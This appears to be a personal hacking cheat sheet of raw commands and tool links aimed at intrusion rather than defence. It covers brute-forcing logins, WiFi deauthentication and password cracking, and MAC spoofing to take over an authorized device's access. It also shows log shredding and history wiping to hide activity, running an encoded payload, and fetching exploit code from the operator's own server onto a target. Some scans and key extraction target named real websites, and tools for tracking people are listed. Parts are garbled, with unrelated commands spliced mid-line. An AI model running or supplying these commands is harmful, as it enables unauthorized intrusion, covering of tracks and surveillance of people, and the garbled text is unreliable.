brutespray --file nmapout.xml --threads 5 brutespray -file nmapout.xml -t 5 -s ftp brutespray --file nmapfuad.xml -U names.txt -P milw0rm-dictionary.txt --threads 5 brutespray --file nmapfuad.xml -U /home/frank/names.txt -P /home/frank/milw0rm-dictionary.txt --threads 5
└─# nmap -sS -T5 -PP -PE -PM -PI localhost
nmap -Sn xxx.xxx # ping scan nmap -sL # list scan, returns device name nmap -Pn # returns oepn ports . devname and mac address nmap -Sn --traceroute xxx.xx/24 nmap -Sn # ping scan nmap -sL # list scan returns device and if its up or down nmap -Pn # returns oepn port, best used with direct IP nmap -Sn --traceroute ip/24 nmap ip.25 -p1-6000 # specify port nmap -sV # find the service version nmap -sV xxx.xxx --version-intensity=9 nmap -o xxx --oscan-guess nmap -A xx.xx version-intensity=9 nmap -sV -A --script=vulners ip --version intesnsity=9 nmap -sV -A xxx.xxx --version-intesity=9
nmap -sV --script=http-php-version testphp.vulnweb.com nmap -oX /home/frank/nmapout.xml nmap cpanel.dedicatedglass.com/24 -oX /home/frank/nmap.xml sudo nmap -sP -n ## nmap to return mac address sudo nmap -sV --scripts=vulscan xxxx whois lookup (PORT SCAN WITH IplisT) sudo nmap -iL iplist.txt sudo apt install ./discord.deb (ScAN, WITH SPEED ) sudo nmap -O -iL iplist.txt -T5
(OSCAN SCAN) sudo nmap -O -iL iplist.txt
(TCP poRT SCAN) sudo nmap -sA -iL iplist.txt
(TCP poRT SCAN) sudo nmap -sU -iL iplist.txt
(PoRT SCAN WEBSITE -layer 2) sudo nmap -PE -sn website.com
(PoRT SCAN WEBSITE -layer 3, fireall) nmap -PA80 -sn website.com
(FIND OPEN PORT AND OS) sudo nmap -sV -p- -A
(FIND IP ADDR OF WEBSITE) nslookup dedicatedglass.com
(BETTERCAP - INTERNAL PROBE) sudo bettercap net.probe on
(FIND THE ROUTER IP) └─$ netstat -r -n Kernel IP routing table
(SCAN COMMON PORTS OF IOT DEVICES) nmap -A -p 80,8080,8081,81
(SCAN DEVICE SPECIFIC PORTS)sudo apt install ./discord.deb Sudo nmap -A -sS -O
kill -9 $$ ## exits the terminal without saving history wget https://raw.githussh -T [email protected] "sudo timeout 60 tcpdump -i wlan0 "not port 22 and not host localhost" -w - " > tcp_dump1.pcap busercontent.com/sundowndev/covermyass/master/covermyass chmod +x covermyass ./covermyass
cd /dev/shm/ rm /root/.bash_history
cd /var/log sudo rm auth.log shred -zu /var/log/auth.log ## safely overwrite logs with 0's and 1's truncate -s 0 /var/log/auth.log
------------------------------------------------------ [PORT-MAN] ------------------------------------------------------
UBUNTU - NGINX - FIREWALL sudo ufw status sudo ufw allow 80/udp sudo ufw allow 80/tcp sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT sudo ufw allow 9999/udp sudo ufw allow 9999/tcp sudo iptables -A INPUT -p tcp --dport 9999 -j ACCEPT sudo iptables -A INPUT -p udp --dport 9999 -j ACCEPT sudo ufw allow 20/tcp sudo ufw allow 21/tcp sudo ufw allow 990/tcp sudo ufw allow 40000:50000/tcp sudo ufw status
useradd -r user2
iwevent -- to get wireless events iwgetid - reports curretn essid / ap
NOISY--> diguise packets hidden behind prexisting servers (by generaitng random traffic)#
git clone https://github.com/1tayH/noisy.git nano config.json python noisy.py --config config.json
------------------------------------------------------ [Change MAC Address] ------------------------------------------------------
sudo apt-get install macchanger aircrack-ng sudo iwconfig wirelessInterface down sudo macchanger -r wirelessInterface ip a # to find current NICs in use sudo airmon-ng start wirelessInterface # to put in into monitor mode sudo airodump-ng wirelessInterface -c 11 --encrypt OPN # to see only open networks --> displays list of connected devices on network sudo ifconfig nicNonMonitorMode down sudo macchanger -m newMacfromabove nicNonMonitormode sudo ifconfig nicNonMonitorMode up
------------------------------------------------------ [PROXYCHAINS] ------------------------------------------------------
sudo apt-get install -y proxychains proxychains nmap ip/24 proxychains tor ------------------------------------------------------[SHRED_LOG_DATA]------------------------------------------------
ls -al /usr/share/nmap/scripts/
exits the terminal without saving history
kill -9 $$
wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass
chmod +x covermyass
cd /dev/shm/ rm /root/.bash_history
cd /var/log sudo rm auth.log shred -zu /var/log/auth.log ## safely overwrite logs with 0's and 1's truncate -s 0 /var/log/auth.log
------------------------------------------------------ SHRED SESSION & TERMINAL LOGS --------------------------------------------
function _removeSSHLogs() { sudo find _sshMSG -type f -exec shred -n 10 {} \ && sudo find /var/log/syslog -type f -exec shred -n 10 {} ; sudo find ~/.ssh/github_rsa.pub -type f -exec shred -n 10 {} } function _removeAllLogs() { echo "[!] Removing Logs.. \n\t Old Logs\n $(lastlog)" sudo find *.log -type f -exec shred -n 10 {} \ && sudo find /var/log -type f -exec shred -n 10 {} # for logs cat /dev/null > ~/.bash_history && history -c && exit ## to remove history sudo grep -r *.log _sysLogs | sudo rm sysLogs ## just in case #1 doesnt wrok rm /root/.bash_history dmesg | less && _checkLogs sudo covermyass now }
function _checkLogs() { cat ./bash_history }
------------------------------------------------------ STAY ANONYMOUS ------------------------------------------------------ macchanger -r [channges mac to a random number] i2prouter start [#### IP2ROUTER --> File sharing / hosting ] tor + proxy vpn (most cant be trusted) https://inteltechniques.com/ [THrow away emails] tempmailer.de https://api.wigle.net/ [excellent gps and realtime tracking tool] shodan.io ## --> d[simular to wiggle, but contains open streams and devices] https://null-byte.wonderhowto.com/how-to/wardrive-android-phone-map-vulnerable-networks-0176136/
grabify.link ## --> track usersr https://nvd.nist.gov/developers/vulnerabilities https://www.exploit-db.com/ securityfocus.com https://sur.ly/i/breachforums.com/ namecheckup.com ## --> osnit https://neatnik.net/steganographr/ --> stenography (*to hide tracks)
netsh int ipv4 set glob defaultcurhoplimit=65 netsh int ipv6 set glob defaultcurhoplimit=65 netsh int ipv6 set glob defaultcurhoplimit=128 # <-- RESET BACK TO DEFUALT
iptables -t mangle -I POSTROUTING 1 -j TTL --ttl-set 66 ########################
py ######## OPEN SSL #######
openssl genrsa -aes-256-cbc -out newkey.key 4096 # generate pvt key openssl rsa -in newkey.key -pubout > public.key # to generate public key openssl rsatl --encrypt -inkey private.key -pubout > public.key -pubin -in messsage.txt -out message.enc ## encrypt a file openssl rsatl --decrypt -inkey myprivate.key -in message.enc > clear_view.txt openssl genrsa -des3 -out another_pvt_key.key 4096 ## to derive anothers public key
openssl rsautl --decruypt -inkey bob-put.key -in secret.enc > message.txt # to decrypt mesg openssl dgst -sha256 -sign private.key -out signer secret.enc openssl base64 -in signer -out my_signature # to sign ssl openssl dgst -sha256 -verify anothers_pub_key.key -signature signer secret.enc
--> OPEN SSL ENCRYPTION Private key openssl genrsa -aes-256-cbc -out macair.key 4096 openssl genrsa -aes-256-cbc -out macair.key 4096
openssl rsa -in frank.key -pubout > frankpublic.key
openssl dgst -sha256 -sign macair.key -out signer verifcation.enc
openssl base64 -in signer -out verifcation.enc
#################################### ################################################
-----------------------------FEW TIPS AND TRICKS---------------------------
unlike wifi, bluetooth negotates a key ones and stores it. this happens on first handshake, making packet inseretion and listneing harder
https://github.com/ghostop14/sparrow-wifi gpsd -D 2 -N /dev/ttyUSB0 # WARDRIVING --> graphs sudo ./sparrow-wifi.py
git clone https://github.com/bitbrute/evillimiter.git cd evillimiter sudo python3 setup.py install sudo evillimiter scan limit 1,2,3,4,5,6 200kbit ## LIMIT OR BLOCK NETWORK USERS block 3 hosts free all
sudo wireshark ## to watch network traffic #####################################################
proxychains firefox ike-scan dnstracer dedicatedglass.com Nslookup dedicatedglass.com (to get dns) Ping -a dedicatedglass.com tlssled 2 ⚙ sslscan -h dedicatedglass.com Recon-ng 2 ⚙ To grab SSL certificates sslyze --regular website or ip nslookup IP >> nslookup.txt http://geoiplookup.net/sudo apt install ./discord.deb
########## DNS LOOKUPS ############
host domain.com ## returns host IP and mailserver host -t ns domain.com host -t mx domain.com host ip_address # reverse dns
nslookup domain.com nslookup # to enter nslookup console
set type=ns domain.com
set type=mx domain.com
dig --help dig domain.com dig domain.com -t mx dig domain.com -t ns dig domain.com AAAA # ipv6 addresses
rar2john $HASHED_FILE rar2john $HASHED_FILE > hash.txt john --format=zip hash.txt
#################### AIRMON-NG // SUITE ####################### ############################################################### radio_name = $(iw dev | awk) '$1=="Interface"{print $2}' sudo airodump-ng wlx0013eff5483f ## fo rmonitoring airodump-ng wlx0013eff5483f --encrypt wep airodump-ng wlx0013eff5483f -c 11 ## TO BROADCAST ESSID airodump-ng wlx0013eff5483f -c 11 & wireshark ## TO BROADCAST ESSID and use wireshark for packet injection
wlan.ta == MAC || wlan.da MAC #(da = destination, ta is starting transmission) eapol #(in wireshark filter--> it displays the handshakes from ^) https://www.youtube.com/watch?v=5guDKTc6Hak aircrack-ng -w 'password-list location' '.pacap location' # get pcap from wireshark ^ --> to crack the password
airodump-ng wlx0013eff5483f --encrypt wep airodump-ng wlx0013eff5483f -c 11 netdiscover -r airodump-ng wlx0013eff5483f --encrypt wep sudo iwlist wlx0013eff5483f scanning | egrep 'Cell |Encryption|Quality|Last beacon|ESSID'
sudo iw dev wlx0013eff5483f scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort
airodump-ng wlx0013eff5483f --encrypt wep aireplay-ng -0 0 mac -c mac_of_radio radio_name airemon-ng start external_radio 6 # the number is the channel (TO START MONITOR MODE) kismet -c radio_name ## GETS THE MAC ADDRESS
#1 find mac for router (-a) and client (-c) netdiscover -r aireplay-ng --deauth 90000000 -a F0:2F:74:2C:7E:88 -c 9a:26:55:ed:ef:84 wlo1
ifrename # to rename wireless iwevent # display wireless events iwgetid # reports current essid iwlist # scan savailable aps or essid iwspy # monitors iw nodes and records strenght and quality of signal
######### TO DISPLAY AND SHOW USB DEVICES #### lspci lscpu lsusb lsblk lslo lsslcb lshw
sudo iwlist [nic name] scan | grep ESSID nmcli dev wifi
wpa_supplicant/hostap hostapd # to create AP for wifi sharing wpa_supplicant # allows scanning and connection to AP
apt install kali-linux-everything
############ NMAP #############
hashcat scp @: scp -r @: # dir scp echo "put files*.xml" | sftp -p -i ~/.ssh/key_name [email protected] #u using relative loc sftp -b batchfile.txt ~/.ssh/key_name [email protected] # using batch in text
apt install brutespray brutespray --file nmapout.xml --threads 5 brutespray -file nmapout.xml -t 5 -s ftp brutespray --file nmapfuad.xml -U names.txt -P milw0rm-dictionary.txt --threads 5 brutespray --file nmapfuad.xml -U /home/frank/names.txt -P /home/frank/milw0rm-dictionary.txt --threads 5
sudo apt install ncrack ncrack -u users.tx -p passwords.txt
sudo apt-get install hydra-gtk sudo apt-get purge hydra-gtk && sudo apt-get autoremove && sudo apt-get autoclean hydra -L users.txt -P passwords.txt location_pass.txt pantor ftp_login host=ip , user=users.txt password- pass.txt 0=users.txt 1=passwords.txt
git clone https://github.com/Mebus/cupp.git nano cupp.config python cupp.py -i
sudo apt install git python3-setuptools python3-tk git clone https://github.com/sc0tfree/mentalist cd mentalist/ sudo python3 setup.py install
#[DOCS] https://github.com/s0md3v/Photon
pip install tld requests git clone https://github.com/s0md3v/Photon.git cd Photon python3 photon.py -h
sudo python3 photon.py -u 'domain.com' --verbose sudo python3 photon.py -u 'domain.com' --keys --dns -t 3
python3 photon.py -u https://www.priceline.com/ --dns python3 photon.py -u https://www.pbs.org/ --keys -t 10 -l 3 ### EXTRACT SECRET KEYS python3 photon.py -u https://www.pbs.com/ --keys -t 10 -l 1 --ninja ### NINJA MODE
wigle.net cd /home/frank/the_harvester python3 theHarvester.py -d dedicatedglass.com -l 500 -b all
git clone 'https://github.com/lanmaster53/recon-ng' workspaces add ws1 ## CERATE WORKSPACE show workspaces workspaces select default show modules add domains ### USE THIS THIS TO ADD TO DATA TABLE FOR EXPLOIT show domains add companies show companies search whois # displays modules that exist for whois use whois_pocs show info ## displays module info and the data structure user provided show # displays information to be used in console show dashboard ## shows all current activities / tasks peformed add # need to #########################################################################
######### metasploit # ########### Msfconsole Search samba_symlink_traversal Use / dir to exploit Show options Set option IP (look for required) Exploit (to run export)
git clone 'https://github.com/offensive-security/exploitdb' searchsploit -h
sudo apt -y install exploitdb sudo apt -y install exploitdb-bin-sploits exploitdb-papers
sudo git clone https://github.com/offensive-security/exploitdb.git /opt/exploitdb sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
brew update && brew install exploitdb
######## LOCALIZED INFO ###### ALL HARDWARE INFO Apt install infix Infix -Fxz
DIRS=$(ls *.txt)
broadcast =
Phonenumbers scanner phoneinfoga scan -n phoneinfoga scan -n "+1 (555) 444-1212"
git clone https://github.com/xillwillx/skiptracer.git skiptracer cd skiptracer pip install -r requirements.txt python skiptracer.py -l (phone|email|sn|name|plate)
https://cybergibbons.com/security-2/quick-and-easy-fake-wifi-access-point-in-kali/ cd /etc/hostapd nano hostapd.conf ./hostapd.conf iwevent
tshark -D tshark -i 2 -i 5 -i 6 tshark -i 2 -i 5 -i 6 > firstWIRE.csv tshark -i wlx0013eff5483f tshark -i wlx0013eff5483f -i any (## all interfaces)
besside-ng en0 -c 6 -b airodump-ng wlx0013eff5483f --encrypt wep
--------------------- WEB APP ==================
site:dedicatedglass.com inurl:http
Allintext:password textfile:log after:2018
apt install whatweb ip whatweb -4 domain.com
dnsrecon -d domain.com whatweb domain.com
python rsf.py
wget https://github.com/aboul3la/Sublist3r/archive/master.zip unzip master.zip ./sublist3r.py -d yourdomain.com
look thru namesystem for hidden
sudo apt install dirbuster
git clone https://github.com/droope/droopescan.git apt install python-pip pip install droopscan pip install -r requirements.txt ./droopescan scan --help
droopscan scan drupal -u URL_HERE droopscan scan silverstripe -u URL_HERE ./droopescan scan --help droopescan scan drupal -u example.org droopescan scan drupal -U list_of_urls.txt droopescan scan -U list_of_urls.txt
python skiptracer.py -l (phone|email|sn|name|plate)
git clone https://github.com/sullo/nikto
cd nikto/program
./nikto.pl -h http://www.example.com
apt install openvas
cd git clone https://github.com/arismelachroinos/lscript.git cd lscript chmod +x install.sh ./install.sh iwconfig wlan0 mode monitor ip a
sudo apt-get install python3-pip requests paramiko beautifulsoup4 pysnmp git clone https://github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py
git clone https://github.com/threat9/routersploit cd routersploit sudo easy_install pip sudo pip install -r requirements.txt
cd cd routersploit sudo python ./rsf.py
show all # Everything on RS
use scanners/autopwn show options ## shows the variales chosen for module seleted ^ set target xxx.xxx.xxx run use exploits/routers/3com/3cradsl72_info_disclosure ## to run specific exploit after scan run show options set target check run
ls -al /usr/share/nmap/scripts/
netdiscover -i eth0 -r 192.168.50.xxx/24
nmap -sn 192.168.50.xxx/24
nmap 192.168.50.TARGET_IP # scans 1000 of most common ports nmap -sS -A -T1 -p- 92.168.50.TARGET_IP -oN target_info_nmap.txt ls -al /usr/share/nmap/scripts/ | grep -e "ftp-" nmap -sV -p 21 192.168.50._TARGET_IP --script /usr/share/nmap/scripts/FTP_SCRIPT_DUMMY searchsploit FTP_SCRIPT_DUMMY msfconsole search FTP_SCRIPT_DUMMY use FOUND_MODULE_FROM_MFS set RHOSTS 192.168.TARGET_IP run
echo ('enter pass:') read pass $(arp-scan -l | grep Raspberry | awk '{print $1}') root $pass apt-get update && apt-get install sparta python-requests
hashcat scp @: scp -r @: # dir scp echo "put files*.xml" | sftp -p -i ~/.ssh/key_name [email protected] #u using relative loc sftp -b batchfile.txt ~/.ssh/key_name [email protected] # using batch in text
CONNECTING TO PUBLIC PORTALS --> swap mac address on whitelist with an already authorized Mac address
sudo apt-get install macchanger aircrack-ng sudo iwconfig wirelessInterface down sudo macchanger -r wirelessInterface ip a # to find current NICs in use sudo airmon-ng start wirelessInterface # to put in into monitor mode sudo airodump-ng wirelessInterface -c 11 --encrypt OPN # to see only open networks --> displays list of connected devices on network sudo ifconfig nicNonMonitorMode down sudo macchanger -m newMacfromabove nicNonMonitormode sudo ifconfig nicNonMonitorMode up
##################### AIRGEDDON ############
git clone 'https://github.com/v1s1t0r1sh3r3/airgeddon' sudo ./airgeddon.sh ## setup config option 2, then option 8, then option 4 (to explore)
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl python3 -m SimpleHttpServer ## log the server IP
python2 -m SimpleHttpServer
wget xxx.xxx/les2.pl # from SimpleHttpServer on to target machine chmod +x les2.pl ./les2.pl ## to run the module --> its on the target PC
git clone https://github.com/0xinfection/tidos-framework.git cd tidos-framework sudo apt-get install libncurses5 libxml2 nmap tcpdump libexiv2-dev build-essential python-pip default-libmysqlclient-dev python-xmpp sudo pip2 install -r requirements.txt chmod +x install ./install sudo tidos
git clone 'https://github.com/lanmaster53/recon-ng' workspaces add ws1 ## CERATE WORKSPACE show workspaces workspaces select default show modules add domains ### USE THIS THIS TO ADD TO DATA TABLE FOR EXPLOIT show domains add companies show companies search whois # displays modules that exist for whois use whois_pocs show info ## displays module info and the data structure user provided show # displays information to be used in console show dashboard ## shows all current activities / tasks peformed add # need to #####################################
git clone https://github.com/evilsocket/bettercap cd bettercap bundle install gem build bettercap.gemspec sudo gem install bettercap*.gem
sudo apt-get install build-essential ruby-dev libpcap-dev apt install golang go get github.com/bettercap/bettercapsudo apt install ./discord.deb cd $GOPATH/src/github.com/bettercap/bettercap make build sudo make install sudo bettercap bettercap
####### NIKTO VULN-SCANNER #########
brew install nikto sudo apt install nikto
nikto -h domain.org -ssl # ssl scan ipcalc local_ip_domain
nmap -p local_ip_doman/24 -oG nmap_out.txt cat nmap_out.txt | awk '/Up$/{print $2}' | nikto -h | cat >> targetIP.txt # awk returns just IP address.. may ahve to play around with $ val cat targetIP.txt nikto -h targetIP.txt
nikto -h www.hell.com | cat >> niktoResults.txt nikto -h www.domain.com -Format msf+
https://www.tenable.com/products/nessus https://localhost:8834/
git clone https://github.com/tokyoneon/Armor cd Armor/ chmod +x armor.sh echo 'ls -la' >/tmp/payload.txt ./armor.sh /tmp/payload.txt 443
cat thisfileisevil.py | base64 python -c "$(printf '%s' 'ENCODED-PAYLOAD-HERE' | base64 -D)"
git clone https://github.com/bitbrute/evillimiter.git cd evillimiter sudo python3 setup.py install sudo evillimiter limit 1,2,3,4,5,6 200kbit ## LIMIT OR BLOCK NETWORK USERS
------------------------------------------------------------------- RESOURCES --------------------------------------------------------------------------
- Books
- Documentation
- Tools
- Cheat Sheets
- Docker
- Vulnerabilities
- Courses
- Online Hacking Demonstration Sites
- Labs
- Security Ruby on Railssudo enum4linux localhost
- https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441/ Hacking: The Art of Exploitation
- https://www.crypto101.io/ - Crypto 101 is an introductory course on cryptography
- http://www.offensive-security.com/metasploit-unleashed/ - Metasploit Unleashed
- http://www.cl.cam.ac.uk/~rja14/book.html - Security Engineering
- https://www.feistyduck.com/library/openssl-cookbook/ - OpenSSL Cookbook
- https://www.manning.com/books/real-world-cryptography - Learn and apply cryptographic techniques.
- https://www.manning.com/books/making-sense-of-cyber-security - A guide to the key concepts, terminology, and technologies of cybersecurity perfect for anyone planning or implementing a security strategy.
- https://www.manning.com/books/cyber-security-career-guide - Kickstart a career in cyber security by learning how to adapt your existing technical and non-technical skills.
- https://www.manning.com/books/secret-key-cryptography - A book about cryptographic techniques and Secret Key methods.
- https://www.manning.com/books/application-security-program-handbook - This practical book is a one-stop guide to implementing a robust application security program.
- https://www.manning.com/books/cyber-threat-hunting - Practical guide to cyber threat hunting.
- https://nostarch.com/bug-bounty-bootcamp - Bug Bounty Bootcamp
- https://nostarch.com/hacking-apis - Hacking APIs
- https://www.manning.com/books/grokking-web-application-security - A book about building web apps that are ready for and resilient to any attack.
- https://www.owasp.org/ - Open Web Application Security Project
- http://www.pentest-standard.org/ - Penetration Testing Execution Standard
- http://www.binary-auditing.com/ - Dr. Thorsten Schneider’s Binary Auditing
- https://appsecwiki.com/ - Application Security Wiki is an initiative to provide all Application security related resources to Security Researchers and developers at one place.
$ sudo tcpdump -i eth0 host -w host_traffic.pcap
https://www.deepinfo.com/ - Deepinfo Attack Surface Platform discovers all your digital assets, monitors them 24/7, detects any issues, and notifies you quickly so you can take immediate action.
https://spyse.com/ - OSINT search engine that provides fresh data about the entire web, storing all data in its own DB, interconnect finding data and has some cool features.
http://www.metasploit.com/ - World's most used penetration testing software
https://findsubdomains.com - Online subdomains pyscanner service with lots of additional data. works using OSINT.
https://github.com/bjeborn/basic-auth-pot HTTP Basic Authentication honeyPot.
http://www.arachni-scanner.com/ - Web Application Security Scanner Framework
https://github.com/sullo/nikto - Nikto web server scanner
http://www.tenable.com/products/nessus-vulnerability-scanner - Nessus Vulnerability Scanner
http://www.portswigger.net/burp/intruder.html - Burp Intruder is a tool for automating customized attacks against web apps.
http://www.openvas.org/ - The world's most advanced Open Source vulnerability scanner and manager.
https://github.com/iSECPartners/Scout2 - Security auditing tool for AWS environments
https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project - Is a multi threaded java application designed to brute force directories and files names on web/application servers.
https://www.owasp.org/index.php/ZAP - The Zed Attack Proxy is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
https://github.com/tecknicaltom/dsniff - dsniff is a collection of tools for network auditing and penetration testing.
https://github.com/WangYihang/Webshell-Sniper - Manage your webshell via terminal.
https://github.com/DanMcInerney/dnsspoof - DNS spoofer. Drops DNS responses from the router and replaces it with the spoofed DNS response
https://github.com/trustedsec/social-engineer-toolkit - The Social-Engineer Toolkit (SET) repository from TrustedSec
https://github.com/sqlmapproject/sqlmap - Automatic SQL injection and database takeover tool
https://github.com/beefproject/beef - The Browser Exploitation Framework Project
http://w3af.org/ - w3af is a Web Application Attack and Audit Framework
https://github.com/espreto/wpsploit - WPSploit, pyExploiting Wordpress With Metasploit
https://github.com/WangYihang/Reverse-Shell-Manager - Reverse shell manager via terminal.
https://github.com/RUB-NDS/WS-Attacker - WS-Attacker is a modular framework for web services penetration testing
https://github.com/wpscanteam/wpscan - WPScan is a black box WordPress vulnerability scanner
http://sourceforge.net/projects/paros/ Paros proxy
https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project Web Scarab proxy
https://code.google.com/p/skipfish/ Skipfish, an active web application security reconnaissance tool
http://www.acunetix.com/vulnerability-scanner/ Acunetix Web Vulnerability Scanner
https://cystack.net/ CyStack Web Security Platform
http://www-03.ibm.com/software/products/en/appscan IBM Security AppScan
https://www.netsparker.com/web-vulnerability-scanner/ Netsparker web vulnerability scanner
http://www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/index.html HP Web Inspect
https://github.com/sensepost/wikto Wikto - Nikto for Windows with some extra features
http://samurai.inguardians.com Samurai Web Testing Framework
https://code.google.com/p/ratproxy/ Ratproxy
http://www.websecurify.com Websecurify
http://sourceforge.net/projects/grendel/ Grendel-scan
https://tools.kali.org/web-applications/gobuster Directory/file and DNS busting tool written in Go
http://www.edge-security.com/wfuzz.php Wfuzz
https://subgraph.com/vega/ Vega
http://websecuritytool.codeplex.com Watcher passive web scanner
http://xss.codeplex.com x5s XSS and Unicode transformations security testing assistant
http://www.beyondsecurity.com/avds AVDS Vulnerability Assessment and Management
http://www.golismero.com Golismero
When performing a version scan (-sV), Nmap sends a series of probes, each of which is assigned a rarity value between one and nine. The lower-numbered probes are effective against a wide variety of common services, while the higher-numbered ones are rarely useful. The intensity level specifies which probes should be applied. The higher the number, the more likely it is the service will be correctly identified. However, high intensity scans take longer. The intensity must be between 0 and 9. The default is 7. When a probe is registered to the target port via the nmap-service-probes ports directive, that probe is tried regardless of intensity level. This ensures that the DNS probes will always be attempted against any open port 53, the SSL probe will be done against 443, etc.
--version-light (Enable light mode)
-sL [NMAP- List subnet without scanning]
This is a convenience alias for --version-intensity 2. This light mode makes version scanning much faster, but it is slightly less likely to identify services.
--version-all (Try every single probe)
An alias for --version-intensity 9, ensuring that every single probe is attempted against each port.
--version-trace (Trace version scan activity)
N-Stalker X
http://www.rapid7.com/products/appspider/ App Spider
http://www.milescan.com ParosPro
https://www.qualys.com/enterprises/qualysguard/web-application-scanning/ Qualys Web Application Scanning
http://www.beyondtrust.com/Products/RetinaNetworkSecurityScanner/ Retina
https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Xenotix XSS Exploit Framework
https://github.com/future-architect/vuls Vulnerability scanner for Linux, agentless, written in golang.
https://github.com/rastating/wordpress-exploit-framework A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
http://www.xss-payloads.com/ XSS Payloads to leverage XSS vulnerabilities, build custom payloads, practice penetration testing skills.
https://github.com/joaomatosf/jexboss JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
https://github.com/commixproject/commix Automated All-in-One OS command injection and exploitation tool
https://github.com/pathetiq/BurpSmartBuster A Burp Suite content discovery plugin that add the smart into the Buster!
https://github.com/GoSecure/csp-auditor Burp and ZAP plugin to analyze CSP headers
https://github.com/ffleming/timing_attack Perform timing attacks against web applications
https://github.com/lalithr95/fuzzapi Fuzzapi is a tool used for REST API pentesting
https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)
https://github.com/nccgroup/wssip Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
https://github.com/PalindromeLabs/STEWS Tool suite for WebSocket discovery, fingerprinting, and vulnerability detection
https://github.com/tijme/angularjs-csti-scanner Automated client-side template injection (sandbox escape/bypass) detection for AngularJS (ACSTIS).
https://reshift.softwaresecured.com A source code analysis tool for detecting and managing Java security vulnerabilities.
https://encoding.tools Web app for transforming binary data and strings, including hashes and various encodings. GPLv3 offline version available.
https://gchq.github.io/CyberChef/ A "Cyber Swiss Army Knife" for carrying out various encodings and transformations of binary data and strings.
https://github.com/urbanadventurer/WhatWeb WhatWeb - Next generation web scanner
https://www.shodan.io/ Shodan - The search engine for find vulnerable servers
https://github.com/WangYihang/Webshell-Sniper A webshell manager via terminal
https://github.com/nil0x42/phpsploit PhpSploit - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner
https://webhint.io/ - webhint - webhint is a customizable linting tool that helps you improve your site's accessibility, speed, cross-browser compatibility, and more by checking your code for best practices and common errors.
https://gtfobins.github.io/ - gtfobins - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
https://github.com/HightechSec/git-scanner git-scanner - A tool for bug hunting or pentesting for targeting websites that have open
repositories available in public -
Web Application Exploitation @ Rawsec Inventory - Complete list of Web pentesting tools
Cyclops is a novel browser that can detect vulnerability automatically - Cyclops is a web browser with XSS detection feature
https://caido.io/ - Web proxy└─$ sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
https://github.com/assetnote/kiterunner - API discovery
https://github.com/owasp-amass/amass - domain recon
https://columbus.elmasy.com/ - Columbus Project is an advanced subdomain discovery service with fast, powerful and easy to use API.
BadUSB Script To Exfiltrate Passwords - Extracts all saved passwords from Chrome, Firefox, and Edge to be saved onto secondary USB for further analysis.
https://github.com/flibustier/jwt-online-cracker - Brute-force HS256, HS384 or HS512 JWT Token from your browser (fully client-side).
- http://n0p.net/penguicon/php_app_sec/mirror/xss.html - XSS cheatsheet
- https://highon.coffee/blog/lfi-cheat-sheet/ - LFI Cheat Sheet
- https://highon.coffee/blog/reverse-shell-cheat-sheet/ - Reverse Shell Cheat Sheet
- https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ - SQL Injection Cheat Sheet
- https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/ - Path Traversal Cheat Sheet: Windows
docker pull kalilinux/kali-linux-docker
official BlackArch Linux
official BlackArch Linuxdocker pull owasp/zap2docker-stable
- official OWASP ZAP
- official WPScan
- docker-metasploit
- Damn Vulnerable Web Application (DVWA)
OWASP Juice Shop
- Vulnerable WordPress Installation
docker pull hmlio/vaas-cve-2014-6271
- Vulnerability as a service: Shellshockdocker pull hmlio/vaas-cve-2014-0160
Security Ninjas
docker pull noncetonic/archlinux-pentest-lxde:1.0
- Docker Bench for Security
- OWASP Security Shepherd
- OWASP WebGoat Project docker image
- OWASP WrongSecrets Project docker image
- OWASP Mutillidae II Web Pen-Test Practice Application
- Docker for pentest
- The Modern Port Scanner
- The Modern Port Scanner
- http://cve.mitre.org/ - Common Vulnerabilities and Exposures. The Standard for Information Security Vulnerability Names
- https://www.exploit-db.com/ - The Exploit Database – ultimate archive of Exploits, Shellcode, and Security Papers.
- http://0day.today/ - Inj3ct0r is the ultimate database of exploits and vulnerabilities and a great resource for vulnerability researchers and security professionals.
- http://www.securityfocus.com/ - Since its inception in 1999, SecurityFocus has been a mainstay in the security community.
- http://packetstormsecurity.com/ - Global Security Resource
- https://wpvulndb.com/ - WPScan Vulnerability Database
- https://snyk.io/vuln/ - Vulnerability DB, Detailed information and remediation guidance for known vulnerabilities.
- https://vulncheck.com/xdb/ - An index of exploit proof-of-concept code in Git repositories.
